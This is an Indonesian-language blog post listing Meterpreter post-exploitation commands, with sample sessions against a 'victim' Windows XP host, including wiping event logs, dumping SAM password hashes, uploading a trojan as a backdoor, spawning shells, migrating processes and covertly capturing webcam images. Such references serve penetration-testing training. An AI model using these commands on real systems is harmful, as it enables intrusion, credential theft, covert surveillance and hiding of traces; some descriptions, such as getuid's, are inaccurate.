Daftar Command Di Meterpreter

 

help

Perintah 'help', yang mungkin diperlukan, untuk menampilkan menu bantuan meterpreter.
meterpreter > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    background    Backgrounds the current session
    channel       Displays information about active channels
...snip...

background

Perintah ' background ' mengembalikan kita kepada prompt msf/prompt sebelum exploit dijalankan.
meterpreter > background
msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

cat

Perintah ' cat ' digunakan untuk membaca sebuah file.
meterpreter > cat namafile.txt

cd & pwd

Perintag 'cd' & perintah 'pwd' digunakan untuk mengubah dan menampilkan saat bekerja langsung pada host target.
Perubahan direktori "cd" bekerja dengan cara yang sama seperti halnya di bawah DOS dan Unix sistem.
Secara default, folder bekerja saat ini adalah di mana sambungan ke Listener Anda dimulai.
ARGUMEN:
cd: Path of the folder to change to
pwd: None required
Contoh penggunaan:
meterpreter > pwd
c:\
meterpreter > cd c:\windows
meterpreter > pwd
c:\windows
meterpreter >

clearev

Perintah 'clearev' akan menghapus aplikasi, Sistem dan log Keamanan pada sistem Window. 
  


meterpreter > clearev
[*] Wiping 97 records from Application...
[*] Wiping 415 records from System...
[*] Wiping 0 records from Security...
meterpreter >

download

Perintah ' download ' adalah untuk mendownload file dari komputer victim, dan gunakan double-slashes ( \\ )untuk menetapkan direktori.
meterpreter > download c:\\boot.ini
[*] downloading: c:\boot.ini -> c:\boot.ini
[*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini
meterpreter >

edit

Perintah 'edit' membuka file yang terletak pada host target.
Ia menggunakan 'vim' sehingga semua perintah editor tersedia.
meterpreter > ls

Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
.
...snip...
.
100666/rw-rw-rw-  0       fil   2012-03-01 13:47:10 -0500  edit.txt

meterpreter > edit edit.txt

excute

Perintah ' execute ' adalah untuk menjalankan aplikasi para komputer victim.
meterpreter > execute -f cmd.exe -i -H
Process 38320 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

getuid

Perintah ' getuid ' adalah untuk menampilkan hostname dari komputer victim.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

hashdump

The 'hashdump' modul posting yang akan membuang isi database SAM.
meterpreter > run post/windows/gather/hashdump 

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...

Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3:::
dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9:::
victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d:::
meterpreter >


idletime

Perintah ' idletime ' adalah perintah untuk mengetahui lama waktu dari pemakaian komputer.
meterpreter > idletime
User has been idle for: 5 hours 26 mins 35 secs
meterpreter >


ipconfig

'ipconfig' perintah ini berfungsi menampilkan interface jaringan dan alamat pada mesin victim.
meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0

AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:10:f5:15
IP Address  : 192.168.1.104
Netmask     : 255.255.0.0

meterpreter >

ls

Seperti di Linux, perintah 'ls' akan menampilkan daftar file dalam direktori pada mesin victim saat ini.
meterpreter > ls

Listing: C:\Documents and Settings\victim
=========================================

Mode              Size     Type  Last modified                   Name
----              ----     ----  -------------                   ----
40777/rwxrwxrwx   0        dir   Sat Oct 17 07:40:45 -0600 2009  .
40777/rwxrwxrwx   0        dir   Fri Jun 19 13:30:00 -0600 2009  ..
100666/rw-rw-rw-  218      fil   Sat Oct 03 14:45:54 -0600 2009  .recently-used.xbel
40555/r-xr-xr-x   0        dir   Wed Nov 04 19:44:05 -0700 2009  Application Data
...snip...

migrate

Perintah ' migrate ' digunakan untuk berpindah pada proses yang lain.
meterpreter > run post/windows/manage/migrate 

[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1076)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 816
[*] New server process: Explorer.EXE (816)
meterpreter >

shell

Perintah ' shell ' adalah perintah untuk mendapatkan shell dari komputer victim(biasanya command Prompt Untuk Windows).
meterpreter > shell
Process 39640 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>


upload

Perintah ' upload ' adalah untuk mengupload file kedalam komputer victim(biasanya backdoor), dan gunakan double-slashes. 
meterpreter > upload evil_trojan.exe c:\\windows\\system32
[*] uploading  : evil_trojan.exe -> c:\windows\system32
[*] uploaded   : evil_trojan.exe -> c:\windows\system32\evil_trojan.exe
meterpreter >

webcam_list

Perintah 'webcam_list dijalankan dari shell meterpreter, akan menampilkan web cam yang tersedia pada host target.
meterpreter > webcam_list
1: Creative WebCam NX Pro
2: Creative WebCam NX Pro (VFW)
meterpreter >

webcam_snap

Perintah "webcam_snap" adalah untuk mengambil gambar dari web cam terhubung pada sistem target, dan menyimpannya ke disk sebagai gambar JPEG. Secara default, menyimpan lokasi direktori yang aktif dengan nama file acak.
meterpreter > webcam_snap -h
Usage: webcam_snap [options]
Grab a frame from the specified webcam.

OPTIONS:

    -h      Help Banner
    -i   The index of the webcam to use (Default: 1)
    -p   The JPEG image path (Default: 'gnFjTnzi.jpeg')
    -q   The JPEG image quality (Default: '50')
    -v   Automatically view the JPEG image (Default: 'true')

meterpreter >

Option:
-h: Menampilkan informasi bantuan untuk perintah
-i opt: Jika lebih dari 1 web cam terhubung, gunakan opsi ini untuk memilih perangkat untuk men-capture gambar
p opt: Ganti path dan nama file gambar yang akan disimpan
q opt: kualitas gambar, 50(default) / pengaturan media, 100 kualitas terbaik
v opt: Secara default value-nya true, yang akan membuka gambar setelah penangkapan.

Source: http://www.offensive-security.com

0 komentar